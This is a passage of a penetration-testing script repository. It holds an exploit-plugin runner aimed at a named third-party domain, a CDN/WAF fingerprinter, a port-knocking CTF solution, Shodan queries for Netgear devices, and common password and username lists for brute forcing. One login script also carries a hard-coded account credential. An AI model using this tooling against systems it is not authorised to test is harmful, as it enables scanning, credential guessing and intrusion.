'd876bfdb7f8cc8e92678c67ed1db7e37a95dd5ef8aaeb304cb7f8a8e86dd9dbc'} 23 | dekey_dic = {'expback_64pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_2066pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_57pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'exp2366.py': '', 'exp2016.py': '', 'expback_100pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1055pyc_dis.py': '7b650aed66397b6e1ba67dfdd39c9626c4c9fec89eebf397a76caa9d0ce45d26', 'expback_45pyc_dis.py': '6eaf26b1043248ae94ca258db5d5b068a610a213aa1d2af703532163d0bd1717', 'expback_22pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_25pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_15pyc_dis.py': '', 'expback_28pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_13pyc_dis.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_61pyc_dis.py': 'e1244c9d55465d4083a2a832fc4732472b91426238d7935d0e39126138afdac1', 'expback_33pyc_dis.py': '48a2a41fd1a72f6feb52c058c767b31726ef9480f5624b9733cf8088e26475b6', 'expback_1071pyc_dis.py': '3d500608da701822cdb9d87c98f28f44eb85b9df06157f3719926283397b40f0', 'expback_101pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_23pyc_dis.py': 'e0a46b005bc3e4b63bf33f9097023d87614810c0b71a355e0934a7bc8a862f32', 'expback_29pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_39pyc_dis.py': '9a176f89756545161a807d6b5803333756eccaaad7ea2daa4e5eeb6c37a09ec0', 'expback_59pyc_dis.py': '6ff51d6ad8855be91270868f2f9d9b2e225c722941906d5c0728a9409ef23b50', 'expback_62pyc_dis.py': 'de92d01ce1a391792c2d4f41996a0b77c6c47605f032bdca21b0b5fd36c0f0f6', 'expback_2065pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1070pyc_dis.py': '', 'expback_2112pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_98pyc_dis.py': '', 'exp1484.py': '', 'expback_82pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1056pyc_dis.py': 'd876bfdb7f8cc8e92678c67ed1db7e37a95dd5ef8aaeb304cb7f8a8e86dd9dbc', 'expback_1756pyc_dis.py': 'ab5d21d688e5789a47b617d47dc68e48a51243b1b93d3beaf737e411310753fe', 'expback_953pyc_dis.py': '', 'expback_63pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_60pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_83pyc_dis.py': 'dd9108e2cb4dce78981dc247e24bd0df5c4b004058ebf271788a8e792d85a026', 'expback_2083pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_641pyc_dis.py': 'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'expback_1766pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_2110pyc_dis.py': '33d7e04bb6b1e472eddb674398e5a3fce8abed59863e43f727ad78498ed63c27', 'exp679.py': '', 'expback_19pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7', 'expback_76pyc_dis.py': '0d98a92bbfd99bbfbcf9419d686661ac36d55d2a7ecc0c19768b0d7b0bd9191d', 'expback_70pyc_dis.py': 'efb1fdfd9905e92bacd3a5367c4727dc7ae722ab7f214e1434b6e25041d34190', 'exp2106.py': '', 'expback_72pyc_dis.py': '8c97d8c12ebb049684db59720d39ad8b38b0081d8cc8d022bd7768ab0bc7c699', 'expback_73pyc_dis.py': 'c3facf1cb2752b65516b130189a508e1469f38055b509392cba7b314ffa070fb', 'expback_89pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_18pyc_dis.py': '54cf6db8b1c27e5c0c73a151a9a0ccdd7b3e2dbccc5c00c041c3479d205a62c4', 'expback_77pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_30pyc_dis.py': 'e034570d4d73b2deeed98ff76911c89ff03ae6f0cef61a09f4091b55783c18b2', 'exp2355.py': '', 'expback_65pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'exp4.py': '', 'expback_2067pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_35pyc_dis.py': '', 'expback_6pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_1994pyc_dis.py': 'ffcc396606397e831f857f22b90d87ca05dd77452e7c2760df0f39d9d3f664cb', 'expback_1062pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1786pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_58pyc_dis.py': '2ec6a4bd513d71efdaaccb3aaf5c27487aef537f6091d14fcce0617c29dbf424', 'expback_24pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'exp2357.py': '', 'expback_34pyc_dis.py': 'd289da3e7b9c736756e3429c23db20228f8e3547d3a4b540da1f86aaf22ff02f', 'exp622.py': '', 'expback_17pyc_dis.py': 'b9e36259d273b00edcbf28048f0b716e08634efaab283f693ca067fe2162f575', 'expback_36pyc_dis.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_54pyc_dis.py': '4903f9969575cdef55f7b2ed2a12f89b97664e7fb5eb0898e6fd4f6775f166f3', 'expback_12pyc_dis.py': 'e3bb69fcc78187a0039fccb03c46298456d5ffb095a1203945c91c59ca3e1993', 'expback_71pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_8pyc_dis.py': 'f8302acee10371dc21ac9029b3a35f45bcdc1b3ecfefefb25771bac202ac32ec', 'expback_811pyc_dis.py': 'f8feb1e2013b989686230a93b8a543f2db83f2cc6b4dbc40f8b30bdf5e0dfeb9', 'expback_75pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'exp1962.py': '', 'expback_1995pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_1745pyc_dis.py': '39b9843a532fed97e232f0a471ffbfb4079d8163a5e7dd52681e57c1e6520e53', 'exp849.py': '', 'expback_16pyc_dis.py': 'f5cebead3a728f681d272e67879a393bc37e3c857076d1b09926eeee1a34739b', 'expback_88pyc_dis.py': 'e77e60afe46271e855a1aaf4738acb8d2712649d7a0e38ee6de5e3cb6e102b19', 'expback_2078pyc_dis.py': '28221b5847a673c1d138bec680e5aab1421a9eed705aca4c316159fd2291b910', 'expback_74pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_26pyc_dis.py': 'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'expback_189pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_37pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_102pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_38pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7','expback_1054pyc_dis.py':'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0'} 24 | 25 | try: 26 | de_key = dekey_dic[filename] 27 | except: 28 | return '' 29 | decode = Decoder(binascii.a2b_hex(de_key)).decode 30 | return decode 31 | 32 | sys.path.append(EXP_DIR) 33 | _G = { 34 | 'scanport':False, 35 | 'subdomain': False, 36 | 'target': 'www.zgqmlt.com', 37 | 'disallow_ip':['127.0.0.1'], 38 | 'kv' : {}, 39 | #'user_dict':'http://192.168.0.158/1.txt' 40 | #'pass_dict':'http://192.168.0.158/1.txt' 41 | } 42 | 43 | util._G = _G 44 | 45 | import sys 46 | 47 | def debug(fmt, *args): 48 | print(fmt % args) 49 | sys.stdout.flush() 50 | 51 | LEVEL_NOTE = 0 52 | LEVEL_INFO =1 53 | LEVEL_WARNING = 2 54 | LEVEL_HOLE = 3 55 | 56 | def _problem(level, body, uuid=None, log=[]): 57 | debug('[LOG] <%s> %s (uuid=%s)', ['note', 'info', 'warning', 'hole'][level], body,str(uuid)) 58 | if log: 59 | if isinstance(log,dict): 60 | log=[log] 61 | for l in log: 62 | print l['response'][:200] 63 | sys.stdout.flush() 64 | 65 | 66 | security_note = partial(_problem,LEVEL_NOTE) 67 | security_info = partial(_problem,LEVEL_INFO) 68 | security_warning = partial(_problem,LEVEL_WARNING) 69 | security_hole = partial(_problem,LEVEL_HOLE) 70 | 71 | def task_push(service, arg, uuid = None, target=None): 72 | if uuid is None: 73 | uuid = str(arg) 74 | 75 | debug('[JOB] <%s> %s (%s/%s)', service, arg, uuid, target) 76 | import os 77 | for path, subdirs, files in os.walk(EXP_DIR): 78 | for fname in files: 79 | if not fname.endswith('.py'): continue 80 | #print fname 81 | pname = fname[:-3] 82 | #try: 83 | # print pname 84 | plg = __import__(pname) 85 | # print plg.__dict__.keys() 86 | #mod = plg.__dict__[name] 87 | mod = plg 88 | mod.decode = get_decode(fname) 89 | mod.curl = curl 90 | mod.security_note = security_note 91 | mod.security_info = security_info 92 | mod.security_warning = security_warning 93 | mod.security_hole = security_hole 94 | mod.util = util 95 | res = None 96 | # if no assign -> res = (True, arg) 97 | if not mod.__dict__.has_key('assign'): 98 | res = (True, arg) 99 | else: 100 | # if assign Success -> res = (True, arg) 101 | # if assign fail -> res = None 102 | res = mod.assign(service, arg) 103 | 104 | 105 | try: 106 | mod.audit(res[1]) 107 | except Exception as e: 108 | pass 109 | #except Exception as e: 110 | # pass 111 | 112 | if __name__ == '__main__': 113 | f = open('target.txt') 114 | for target in f: 115 | target = target.strip() 116 | #print target 117 | task_push('www',target,'uuidxxxxxxxxxxxxxxxxx',target) 118 | -------------------------------------------------------------------------------- /Python/cdn_identify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # 根据ip range和 header判断,合成的轮子。 4 | # 使用方法./cdn_identify.py http://jiasule.com 5 | 6 | 7 | from requests import session 8 | from base64 import b64decode 9 | import netaddr 10 | from netaddr import IPNetwork, IPAddress 11 | import socket 12 | from urlparse import urlparse 13 | 14 | class Fingerprint(object): 15 | def __init__(self): 16 | self.s = session() 17 | self.s.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' 18 | 19 | def detect(self, url): 20 | cdn_list = {'ips_cdn_cloudflare':['199.27.128.0/21','173.245.48.0/20','103.21.244.0/22','103.22.200.0/22','103.31.4.0/22','141.101.64.0/18','108.162.192.0/18','190.93.240.0/20','188.114.96.0/20','197.234.240.0/22','198.41.128.0/17','162.158.0.0/15','104.16.0.0/12'], 21 | 'ips_cdn_360': ['183.136.133.0-183.136.133.255','220.181.55.0-220.181.55.255','101.226.4.0-101.226.4.255','180.153.235.0-180.153.235.255','122.143.15.0-122.143.15.255','27.221.20.0-27.221.20.255','202.102.85.0-202.102.85.255','61.160.224.0-61.160.224.255','112.25.60.0-112.25.60.255','182.140.227.0-182.140.227.255','221.204.14.0-221.204.14.255','222.73.144.0-222.73.144.255','61.240.144.0-61.240.144.255','113.17.174.0-113.17.174.255','125.88.189.0-125.88.189.255','125.88.190.0-125.88.190.255','120.52.18.1-120.52.18.255'], 22 | 'ips_cdn_jiasule':['119.188.35.0-119.188.35.255','61.155.222.0-61.155.222.255','218.65.212.0-218.65.212.255','116.211.121.0-116.211.121.255','103.15.194.0-103.15.194.255','61.240.149.0-61.240.149.255','222.240.184.0-222.240.184.255','112.25.16.0-112.25.16.255','59.52.28.0-59.52.28.255','211.162.64.0-211.162.64.255','180.96.20.0-180.96.20.255','103.1.65.0-103.1.65.255'], 23 | 'ips_cdn_anquanbao' :['220.181.135.1-220.181.135.255','115.231.110.1-115.231.110.255','124.202.164.1-124.202.164.255','58.30.212.1-58.30.212.255','117.25.156.1-117.25.156.255','36.250.5.1-36.250.5.255','183.60.136.1-183.60.136.255','183.61.185.1-183.61.185.255','14.17.69.1-14.17.69.255','120.197.85.1-120.197.85.255','183.232.29.1-183.232.29.255','61.182.141.1-61.182.141.255','182.118.12.1-182.118.12.255','182.118.38.1-182.118.38.255','61.158.240.1-61.158.240.255','42.51.25.1-42.51.25.255','119.97.151.1-119.97.151.255','58.49.105.1-58.49.105.255','61.147.92.1-61.147.92.255','69.28.58.1-69.28.58.255','176.34.28.1-176.34.28.255','54.178.75.1-54.178.75.255','112.253.3.1-112.253.3.255','119.167.147.1-119.167.147.255','123.129.220.1-123.129.220.255','223.99.255.1-223.99.255.255','117.34.72.1-117.34.72.255','117.34.91.1-117.34.91.255','123.150.187.1-123.150.187.255','221.238.22.1-221.238.22.255','125.39.32.1-125.39.32.255','125.39.191.1-125.39.191.255','125.39.18.1-125.39.18.255','14.136.130.1-14.136.130.255','210.209.122.1-210.209.122.255','111.161.66.1-111.161.66.255'], 24 | 'ips_cdn_incapsula':['199.83.128.0/21','198.143.32.0/19','149.126.72.0/21','103.28.248.0/22','45.64.64.0/22','185.11.124.0/22 ','192.230.64.0/18'], 25 | 'ips_cdn_yunjiasu':['222.216.190.0-222.216.190.255','61.155.149.0-61.155.149.255','119.188.14.0-119.188.14.255','61.182.137.0-61.182.137.255','117.34.28.0-117.34.28.255','119.188.132.0-119.188.132.255','42.236.7.0-42.236.7.255','183.60.235.0-183.60.235.255','117.27.149.0-117.27.149.255','216.15.172.0/24']} 26 | 27 | cc = [] 28 | try: 29 | ips = socket.gethostbyname_ex(url.split('/')[2]) 30 | except socket.gaierror: 31 | ips=[] 32 | for ip_addr in ips[2]: 33 | for cdn in cdn_list: 34 | for cidr in cdn_list[cdn]: 35 | if '-' in cidr: 36 | l = cidr.split('-') 37 | ip_range = netaddr.iter_iprange(l[0],l[1]) 38 | ip_range = netaddr.cidr_merge(ip_range) 39 | for i in ip_range: 40 | if ip_addr in i: 41 | cc.append(cdn) 42 | else: 43 | pass 44 | else: 45 | if ip_addr in cidr: 46 | cc.append(cdn) 47 | print '------------cidr--------------' 48 | print cc 49 | resp = self.s.get(url, allow_redirects=False, verify=False) 50 | if resp.history: 51 | headers = resp.history[0].headers 52 | cookies = resp.history[0].cookies 53 | else: 54 | headers = resp.headers 55 | cookies = resp.cookies 56 | 57 | result = [] 58 | for prop in dir(self): 59 | if prop.startswith('finger_'): 60 | func = getattr(self, prop) 61 | r = func(headers, cookies) 62 | if r: 63 | result.append(r) 64 | print '------------header------------' 65 | print result 66 | return result 67 | 68 | 69 | 70 | 71 | 72 | def finger_jiasule(self, headers, cookies): 73 | if '__jsluid' in cookies.keys(): 74 | return 'jiasule' 75 | 76 | def finger_cloudflare(self, headers, cookies): 77 | if '__cfduid' in cookies.keys(): 78 | return 'cloudflare' 79 | elif 'cloudflare' in headers.get('server', ''): 80 | return 'cloudflare' 81 | 82 | def finger_360webscan(self, headers, cookies): 83 | if 'webscan.360.cn' in headers.get('x-safe-firewall', ''): 84 | return '360webscan' 85 | 86 | def finger_360wzb(self, headers, cookies): 87 | if headers.get('x-powered-by-360wzb') != None: 88 | return '360wzb' 89 | 90 | def finger_anquanbao(self, headers, cookies): 91 | if headers.get('x-powered-by-anquanbao') != None: 92 | return 'anquanbao' 93 | 94 | def finger_incapsula(self, headers, cookies): 95 | if 'incapsula' in headers.get('x-cdn', '').lower(): 96 | return 'incapsula' 97 | if any(map(lambda item: item.startswith(('incap_ses', 'visid_incap_')), cookies.keys())): 98 | return 'incapsula' 99 | 100 | def finger_yunjiasu(self, headers, cookies): 101 | x_server = headers.get('x-server', '') 102 | try: 103 | if b64decode(x_server).endswith('.fhl'): 104 | return 'yunjiasu' 105 | except: 106 | return 107 | 108 | if __name__ == '__main__': 109 | from sys import argv 110 | 111 | f = Fingerprint() 112 | f.detect(argv[1]) 113 | -------------------------------------------------------------------------------- /Python/drcom2.6.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import urllib 3 | import urllib2 4 | from time import sleep 5 | 6 | url = 'http://192.168.168.168' 7 | values = ({ 8 | '0MKKey' : '%B5%C7%C2%BC%20Login', 9 | 'DDDDD' : '1100B0100', 10 | 'upass' : '226295' 11 | }) 12 | data = urllib.urlencode(values) 13 | data = data.encode('utf-8') 14 | def usage(): 15 | print(''' 16 | Usage: 17 | 18 | ./drcom i //log in 19 | ./drcom o //log out 20 | ''') 21 | 22 | if __name__ == "__main__": 23 | if(len(sys.argv) != 2): 24 | usage() 25 | sys.exit() 26 | elif(sys.argv[1] == 'o'): 27 | l = urllib2.urlopen('http://192.168.168.168/F.htm') 28 | if (l): 29 | print('\nyou have loged out!\n') 30 | sys.exit() 31 | elif(sys.argv[1] == 'i'): 32 | req = urllib2.Request(url, data) 33 | response = urllib2.urlopen(req) 34 | if(response): 35 | d = response.read() 36 | #print(d.decode("gb2312")) 37 | print('\nyou have loged in!!\n ') 38 | sys.exit() 39 | else: 40 | usage() 41 | sys.exit() 42 | -------------------------------------------------------------------------------- /Python/port_knocking.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # sheldon.py 3 | # EINDBAZEN solution to port knocking challenge PHD CTF Quals 2011 4 | 5 | # Import scapy 6 | from scapy.all import * 7 | conf.verb = 0 8 | # Ports 9 | ports = [951, 4826, 9402, 235, 16821, 443, 100] 10 | # Knock twice on every port 11 | for dport in range(0, len(ports)): 12 | print "[*] Knocking on 192.168.0.5: " , ports[dport] 13 | ip = IP(dst="192.168.0.5") 14 | port = 39367 15 | SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0) 16 | send(SYN) ; print "*KNOCK*" 17 | port = 39368 18 | SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0) 19 | send(SYN) ; print "*KNOCK*" 20 | print "PENNY" 21 | # Use NMAP for scanning for open ports 22 | # We also use -sV, so nmap connects to the port and get the flag 23 | print "[*] Scanning for open ports using nmap" 24 | subprocess.call("nmap -sS -sV -T4 -p 1024-2048 192.168.0.5", shell=True) 25 | -------------------------------------------------------------------------------- /Python/port_knocking.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | HOST=$1 3 | shift 4 | for ARG in "$@" 5 | do 6 | nmap -Pn --host_timeout 100 --max-retries 0 -p $ARG $HOST 7 | done 8 | 9 | #usage [root:~]# ./knock.sh 10.0.1.113 7000 8000 9000 7000 8000 && telnet 10.0.1.113 8888 10 | -------------------------------------------------------------------------------- /Python/readlog/read.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/readlog/read.txt -------------------------------------------------------------------------------- /Python/readlog/readlog.py: -------------------------------------------------------------------------------- 1 | #encoding=utf8 2 | import re 3 | 4 | f = open("../log1.txt") # 返回一个文件对象 5 | line = f.readline() # 调用文件的 readline()方法 6 | count=1 7 | while line: 8 | #print count 9 | #count=count+1 10 | #print line, # 后面跟 ',' 将忽略换行符 11 | name=re.findall(r"Account Name:\s{2}(.*)\r\r",str(line)) 12 | sourceip=re.findall(r"Source Network Address:\s(.*)\r\r",str(line)) 13 | if sourceip: 14 | print sourceip 15 | if name: 16 | print name 17 | #print type(line) 18 | # print(line, end = '')   # 在 Python 3中使用 19 | line = f.readline() 20 | 21 | f.close() 22 | -------------------------------------------------------------------------------- /Python/shodan/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/shodan/.DS_Store -------------------------------------------------------------------------------- /Python/shodan/get.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | def shodanSearch(keywords): 4 | 5 | SHODAN_API_KEY = "x" 6 | api = shodan.Shodan(SHODAN_API_KEY) 7 | 8 | iplist = [] 9 | total = 0 10 | 11 | try: 12 | results = api.search(keywords) 13 | total = int(results['total']) 14 | for result in results['matches']: iplist.append({"ip":result['ip_str'],"country":result['location']['country_name']}) 15 | return total,iplist 16 | 17 | except shodan.APIError, e: 18 | print 'Error: %s' % e 19 | 20 | 21 | print shodanSearch('netgear country:"AU"') 22 | -------------------------------------------------------------------------------- /Python/shodan/search.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | SHODAN_API_KEY = "x" 4 | 5 | api = shodan.Shodan(SHODAN_API_KEY) 6 | 7 | 8 | try: 9 | # Search Shodan 10 | results = api.search('netgear country:"AU"') 11 | 12 | # Show the results 13 | print 'Results found: %s' % results['total'] 14 | for result in results['matches']: 15 | print '%s %s' % (result['ip_str'],result['port']) 16 | #print result['data'] 17 | print '' 18 | except shodan.APIError, e: 19 | print 'Error: %s' % e 20 | -------------------------------------------------------------------------------- /Python/top500/Top100Pwd.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | a123456 3 | 123456a 4 | 5201314 5 | 111111 6 | woaini1314 7 | qq123456 8 | 123123 9 | 000000 10 | 1qaz2wsx 11 | 1q2w3e4r 12 | qwe123 13 | 7758521 14 | 123qwe 15 | a123123 16 | 123456aa 17 | woaini520 18 | woaini 19 | 100200 20 | 1314520 21 | woaini123 22 | 123321 23 | q123456 24 | 123456789 25 | 123456789a 26 | 5211314 27 | asd123 28 | a123456789 29 | z123456 30 | asd123456 31 | a5201314 32 | aa123456 33 | zhang123 34 | aptx4869 35 | 123123a 36 | 1q2w3e4r5t 37 | 1qazxsw2 38 | 5201314a 39 | 1q2w3e 40 | aini1314 41 | 31415926 42 | q1w2e3r4 43 | 123456qq 44 | woaini521 45 | 1234qwer 46 | a111111 47 | 520520 48 | iloveyou 49 | abc123 50 | 110110 51 | 111111a 52 | 123456abc 53 | w123456 54 | 7758258 55 | 123qweasd 56 | 159753 57 | qwer1234 58 | a000000 59 | qq123123 60 | zxc123 61 | 123654 62 | abc123456 63 | 123456q 64 | qq5201314 65 | 12345678 66 | 000000a 67 | 456852 68 | as123456 69 | 1314521 70 | 112233 71 | 521521 72 | qazwsx123 73 | zxc123456 74 | abcd1234 75 | asdasd 76 | 666666 77 | love1314 78 | QAZ123 79 | aaa123 80 | q1w2e3 81 | aaaaaa 82 | a123321 83 | 123000 84 | 11111111 85 | 12qwaszx 86 | 5845201314 87 | s123456 88 | nihao123 89 | caonima123 90 | zxcvbnm123 91 | wang123 92 | 159357 93 | 1A2B3C4D 94 | asdasd123 95 | 584520 96 | 753951 97 | 147258 98 | 1123581321 99 | 110120 100 | qq1314520 -------------------------------------------------------------------------------- /Python/top500/Top500Name.txt: -------------------------------------------------------------------------------- 1 | zhangwei 2 | wangwei 3 | wangfang 4 | liwei 5 | lina 6 | zhangmin 7 | lijing 8 | wangjing 9 | liuwei 10 | wangxiuying 11 | zhangli 12 | lixiuying 13 | wangli 14 | zhangjing 15 | zhangxiuying 16 | liqiang 17 | wangmin 18 | limin 19 | wanglei 20 | liuyang 21 | wangyan 22 | wangyong 23 | lijun 24 | zhangyong 25 | lijie 26 | zhangjie 27 | zhanglei 28 | wangqiang 29 | lijuan 30 | wangjun 31 | zhangyan 32 | zhangtao 33 | wangtao 34 | liyan 35 | wangchao 36 | liming 37 | liyong 38 | wangjuan 39 | liujie 40 | liumin 41 | lixia 42 | lili 43 | zhangjun 44 | wangjie 45 | zhangqiang 46 | wangxiulan 47 | wanggang 48 | wangping 49 | liufang 50 | zhangyan 51 | liuyan 52 | liujun 53 | liping 54 | wanghui 55 | wangyan 56 | chenjing 57 | liuyong 58 | liling 59 | liguiying 60 | wangdan 61 | ligang 62 | lidan 63 | liping 64 | wangpeng 65 | liutao 66 | chenwei 67 | zhanghua 68 | liujing 69 | litao 70 | wangguiying 71 | zhangxiulan 72 | lihong 73 | lichao 74 | liuli 75 | zhangguiying 76 | wangyulan 77 | liyan 78 | zhangpeng 79 | lixiulan 80 | zhangchao 81 | wangling 82 | zhangling 83 | lihua 84 | wangfei 85 | zhangyulan 86 | wangguilan 87 | wangying 88 | liuqiang 89 | chenxiuying 90 | liying 91 | lihui 92 | limei 93 | chenyong 94 | wangxin 95 | lifang 96 | zhangguilan 97 | libo 98 | yangyong 99 | wangxia 100 | ligui 101 | wangbin 102 | lipeng 103 | zhangping 104 | zhangli 105 | zhanghui 106 | zhangyu 107 | liujuan 108 | libin 109 | wanghao 110 | chenjie 111 | wangkai 112 | chenli 113 | chenmin 114 | wangxiu 115 | liyu 116 | liuxiu 117 | wangping 118 | zhangbo 119 | liugui 120 | yangxiu 121 | zhangying 122 | yangli 123 | zhangjian 124 | lijun 125 | lili 126 | wangbo 127 | zhanghong 128 | liudan 129 | lixin 130 | wangli 131 | yangjing 132 | liuchao 133 | zhangjuan 134 | yangfan 135 | liuyan 136 | liuying 137 | lixue 138 | lixiu 139 | zhangxin 140 | wangjian 141 | liuyu 142 | liuhui 143 | liubo 144 | zhanghao 145 | zhangming 146 | chenyan 147 | zhangxia 148 | chenyan 149 | yangjie 150 | wangshuai 151 | lihui 152 | wangxue 153 | yangjun 154 | zhangxu 155 | liugang 156 | wanghua 157 | yangmin 158 | wangning 159 | lining 160 | wangjun 161 | liubin 162 | zhangping 163 | wangting 164 | chentao 165 | wangyu 166 | wangna 167 | zhangbin 168 | chenlong 169 | lilin 170 | zhangfeng 171 | wanghong 172 | lifeng 173 | yangyang 174 | liting 175 | zhangjun 176 | wanglin 177 | chenying 178 | chenjun 179 | liuxia 180 | chenhao 181 | zhangkai 182 | wangjing 183 | chenfang 184 | zhangting 185 | yangtao 186 | yangbo 187 | chenhong 188 | liuhuan 189 | chenjuan 190 | chengang 191 | wanghui 192 | zhangying 193 | zhanglin 194 | zhangna 195 | zhangyu 196 | wangfeng 197 | liujia 198 | liulei 199 | zhangqian 200 | liupeng 201 | wangxu 202 | zhangxue 203 | liyang 204 | zhangxiu 205 | wangmei 206 | wangjian 207 | wangying 208 | liuping 209 | yangmei 210 | lifei 211 | wangliang 212 | lilei 213 | lijian 214 | wangyu 215 | chenling 216 | zhangjian 217 | liuxin 218 | wangqian 219 | zhangshuai 220 | lijian 221 | chenlin 222 | liyang 223 | chenqiang 224 | zhaojing 225 | wangcheng 226 | chenchao 227 | chenliang 228 | liuna 229 | wangqin 230 | zhanglan 231 | zhanghui 232 | liuchang 233 | liqian 234 | yangyan 235 | zhangliang 236 | liyun 237 | zhangqin 238 | wanglan 239 | liuping 240 | chengui 241 | liuying 242 | yangchao 243 | zhangmei 244 | chenping 245 | liuhong 246 | zhaowei 247 | zhangyun 248 | zhangning 249 | yanglin 250 | zhangjie 251 | gaofeng 252 | yangyang 253 | chenhua 254 | yanghua 255 | yangliu 256 | liuyang 257 | wangshu 258 | yangfang 259 | lichun 260 | liujun 261 | wanghai 262 | liuling 263 | chenchen 264 | wanghuan 265 | lidong 266 | zhanglong 267 | chenbo 268 | chenlei 269 | wangyun 270 | wangfeng 271 | wangrui 272 | liqin 273 | chenpeng 274 | wangying 275 | liufei 276 | chenming 277 | wanggui 278 | lihao 279 | wangzhi 280 | zhangdan 281 | lifeng 282 | liufeng 283 | lijia 284 | chenhui 285 | zhangfang 286 | lilan 287 | chenyu 288 | chenxia 289 | liukai 290 | liuhua 291 | libing 292 | zhanglei 293 | wangdong 294 | wanglin 295 | liying 296 | yangwei 297 | wanglong 298 | liuting 299 | chenxiu 300 | liuming 301 | zhoumin 302 | huangwei 303 | zhanghai 304 | lizhi 305 | yanglei 306 | lijing 307 | liujian 308 | zhaomin 309 | chenyun 310 | lihai 311 | zhanggui 312 | zhangjing 313 | liuli 314 | likai 315 | zhangfeng 316 | zhangzhi 317 | lilong 318 | lishuai 319 | lixin 320 | liuyun 321 | lijie 322 | wangchun 323 | chenbin 324 | zhangying 325 | chenfei 326 | wangbo 327 | liuhao 328 | huangxiu 329 | lishu 330 | huangyong 331 | zhouwei 332 | libin 333 | wangkun 334 | liuhui 335 | lixiang 336 | zhangrui 337 | liushuai 338 | zhangfei 339 | wangyang 340 | chenjie 341 | wangrong 342 | wuxiu 343 | yangming 344 | mali 345 | liuqian 346 | yangling 347 | yangping 348 | wangbin 349 | liliang 350 | lirong 351 | lilin 352 | liyan 353 | wangbing 354 